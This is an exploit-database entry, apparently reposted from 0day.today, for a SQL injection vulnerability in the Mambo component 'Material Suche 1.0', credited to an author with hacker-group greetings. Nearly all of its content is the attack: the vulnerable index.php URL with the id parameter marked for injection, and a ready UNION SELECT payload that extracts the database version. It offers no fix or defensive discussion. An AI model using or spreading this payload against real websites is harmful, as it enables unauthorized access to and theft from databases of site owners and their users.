id: 10454
date: 12/27/2009
title: Mambo Component Material Suche 1.0 SQL injection Vulnerability
author: Gamoscu
cves: 

==============================================================
Mambo Component Material Suche 1.0 SQL injection Vulnerability
==============================================================

#############################################################
# Mambo Component Material Suche 1.0 SQL injection Vulnerability
 
# Author: Gamoscu
 
# Site: www.1923turk.biz
 
# Site: http://gamoscu.wordpress.com/
 
# Greetz: Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
   
##############################################################
 
# Exploit:
 
   index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=[SQL-inj]
 
 
  -1+union+select+1,2,3,version(),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
      
##############################################################



#  0day.today [2023-03-27]  #